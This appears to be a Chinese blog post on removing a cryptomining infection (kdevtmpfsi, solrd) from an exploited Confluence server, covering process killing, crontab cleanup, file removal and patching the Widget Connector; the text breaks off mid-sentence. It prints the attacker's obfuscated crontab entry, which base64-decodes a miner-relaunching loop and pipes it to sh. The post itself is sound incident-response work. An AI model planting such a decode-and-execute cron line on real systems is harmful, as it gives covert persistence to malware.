confluence挖矿病毒(kdevtmpfsi 、solrd)解决

自己安装了conference,没用1周。发现服务器内存被吃完了。

定位问题:

1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒

2、感谢 https://www.cnblogs.com/hack404/p/11464890.html 作者的帮助。

处理过程:

1. 先封掉外网HTTP 端口

使用腾讯云控制台 安全组 设置80端口不允许访问。

2. 查杀进程

使用命令:top 查看pid 并使用 kill -9 ‘pid’

发现进程越杀越多,继续看文档。

3.查看是否存在定时任务

使用命令:crontab -l

发现这些是 腾讯云的定时任务。

再使用命令: crontab -l -u confluence2 查看

发现与文档一样的定时任务

* * * * * echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCAyNzMxNiA+L2Rldi9udWxsIDI+JjEgOyB0aGVuIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9ya3dwcm4gOyBmaSA7IGRvbmUgKSAmIHBpZD0kISA7IChzbGVlcCAyNSAmJiBraWxsIC05ICRwaWQpICY=" | base64 -d | sh >/dev/null 2>&1

base64 解密为:

( while : ; do sleep 5 ; if ! kill -0 27316 >/dev/null 2>&1 ; then rkwprn ; fi ; done ) & pid=$! ; (sleep 25 && kill -9 $pid) &

我的神,死循环怪不得CPU 那么高。。。

4.杀死定时任务

使用命令:crontab -r -u confluence2

查询定时任务为空

5.清除/tmp/下所有confluence2 用户创建的目录

该目录为病毒文件

6.清除/opt/atlassian/confluence/temp/ 下所有confluence2 用户创建的目录

不是非常清楚是什么文件。应该是攻击confluence 的病毒文件

7.升级confluence

安全建议

以下任选一种皆可修复漏洞

a、升级至安全版本。下载链接:

https://www.atlassian.com/software/confluence/download/

https://atlassian.com/software/confluence/download/data-center

b、升级Widget Connector 组件。

Linux系统运行如下命令查找widgetconnector-*.jar文件所在位置:

find / -name "widgetconnector-*"

下载最新版本的widgetconnector-3.1.4.jar替换,并重启Confluence应用

我们选用的是 B方案 替换 j

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值